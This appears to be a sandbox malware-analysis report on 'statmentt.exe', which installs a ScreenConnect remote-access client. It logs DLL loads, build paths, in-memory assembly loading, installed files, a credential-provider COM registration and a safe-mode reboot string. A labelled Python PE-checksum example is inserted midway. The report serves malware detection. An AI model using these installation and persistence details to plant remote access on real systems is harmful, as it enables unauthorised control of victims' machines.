                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: statmentt.exeStatic PE information: certificate valid
                              Source: statmentt.exeStatic file information: File size 5652448 > 1048576
                              Source: statmentt.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                              Source: statmentt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: statmentt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: statmentt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: statmentt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: statmentt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: statmentt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: statmentt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: statmentt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1888572432.0000000001592000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: statmentt.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: statmentt.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: statmentt.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3042947726.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: statmentt.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3027011781.0000000002441000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1888442965.0000000001550000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1888844830.00000000015D2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1889347392.0000000003271000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: statmentt.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1818911448.0000000000F6D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: statmentt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1799483150.0000000004200000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: statmentt.exe, 68f199.msi.2.dr, 68f19b.msi.2.dr, MSIF488.tmp.2.dr, MSIF739.tmp.2.dr, 68f19a.rbs.2.dr, MSIF458.tmp.2.dr, setup.msi.0.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3042947726.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: statmentt.exe, 68f199.msi.2.dr, MSIEC0B.tmp.1.dr, 68f19b.msi.2.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: statmentt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1888572432.0000000001592000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.3042947726.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: statmentt.exe
Source: statmentt.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: statmentt.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: statmentt.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: statmentt.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: statmentt.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              Source: 0.0.statmentt.exe.11078f8.5.raw.unpack, Program.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: statmentt.exe Static PE information: real checksum: 0x54fd91 should be: 0x56609d
                              Source: C:\Users\user\Desktop\statmentt.exe Code function: 0_2_017F6F00 push eax; mov dword ptr [esp], ecx 0_2_017F6F11
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Code function: 7_2_0583B483 push eax; ret 7_2_0583B499
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Code function: 7_2_05BE66D0 pushfd ; ret 7_2_05BE66FD
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Code function: 7_2_05BE03A0 pushad ; ret 7_2_05BE03B3
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Code function: 7_2_05BE43D1 push esp; ret 7_2_05BE43E3
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 8_2_00007FFD9B2B2B18 push ecx; retf 8_2_00007FFD9B2BB40C
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 8_2_00007FFD9B2A7523 push ebx; iretd 8_2_00007FFD9B2A756A
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 8_2_00007FFD9B2BB361 push ecx; retf 8_2_00007FFD9B2BB40C
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B599BE5 push FFFFFFB3h; ret 9_2_00007FFD9B599CF4
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B59279F push ss; iretd 9_2_00007FFD9B5927A6
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B59AA06 push esi; ret 9_2_00007FFD9B59AA07
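The "real checksum ... should be" entry above compares the CheckSum field of the PE optional header with the value the checksum algorithm yields over the whole file. The Python below is an added example, not code from the report or from Joe Sandbox: it reimplements that computation (the algorithm imagehlp's CheckSumMappedFile uses: a 32-bit word sum with carry folding that skips the CheckSum field itself, folded to 16 bits, plus the file length) so the finding can be reproduced on any sample. The embedded input is a constructed minimal PE32 header blob with a deliberately wrong CheckSum, not the analysed file. Two caveats a practitioner should keep in mind: a stored value of 0 is normal for ordinary executables (Windows only enforces the checksum for boot-loaded drivers and DLLs), while a non-zero value that does not match means the bytes were changed after the linker wrote them, for example by patching, packing or appending data.

```python
import struct

# Added example, not part of the Joe Sandbox report: recompute the PE header
# CheckSum the way imagehlp's CheckSumMappedFile does, so a "real checksum X
# should be Y" finding can be reproduced on any sample.


def _checksum_field_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum (same for PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # PE signature (4) + IMAGE_FILE_HEADER (20) + CheckSum at +0x40 in the optional header
    return e_lfanew + 4 + 20 + 0x40


def header_checksum(data: bytes) -> int:
    """CheckSum value as stored in the optional header."""
    return struct.unpack_from("<I", data, _checksum_field_offset(data))[0]


def pe_checksum(data: bytes) -> int:
    """Expected CheckSum: sum of all little-endian 32-bit words (file zero-padded
    to a multiple of 4), skipping the CheckSum field, with carries folded back in,
    then folded to 16 bits, plus the unpadded file length."""
    skip = _checksum_field_offset(data)
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def checksum_status(data: bytes) -> tuple[int, int, bool]:
    """(stored, computed, matches) for one file image."""
    stored, computed = header_checksum(data), pe_checksum(data)
    return stored, computed, stored == computed


def fix_checksum(data: bytes) -> bytes:
    """Copy of the image with the CheckSum field set to the computed value."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, _checksum_field_offset(data), pe_checksum(data))
    return bytes(buf)


def constructed_sample() -> bytes:
    """Constructed test data, not a real binary: a minimal PE32 header blob whose
    CheckSum field holds a deliberately wrong value (0xDEADBEEF)."""
    buf = bytearray(0x200)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)           # e_lfanew -> PE header at 0x40
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HH", buf, 0x44, 0x014C, 1)     # Machine = i386, NumberOfSections = 1
    struct.pack_into("<HH", buf, 0x54, 0xE0, 0x0102)  # SizeOfOptionalHeader, Characteristics
    struct.pack_into("<H", buf, 0x58, 0x10B)          # PE32 magic
    struct.pack_into("<I", buf, 0x98, 0xDEADBEEF)     # CheckSum field (0x58 + 0x40), wrong on purpose
    return bytes(buf)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else constructed_sample()
    stored, computed, ok = checksum_status(blob)
    print(f"stored 0x{stored:x}, computed 0x{computed:x}: {'OK' if ok else 'MISMATCH'}")
```

Run it with a file path to check a real sample, or without arguments to see the mismatch on the constructed blob. Because the CheckSum field is excluded from the sum, writing the computed value back (fix_checksum) makes the file self-consistent without changing the computed value, which is exactly why a mismatch is evidence of post-link modification rather than of a broken algorithm.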

                              Persistence and Installation Behavior

                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                              Source: c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.windowscredentialprovider.dll COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-406f-012c01771397}\inprocserver32
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.InstallerActions.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Windows.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF488.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Core.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll
                              Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF739.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.Compression.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.Compression.Cab.dll
                              Source: ScreenConnect.ClientService.dll.2.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
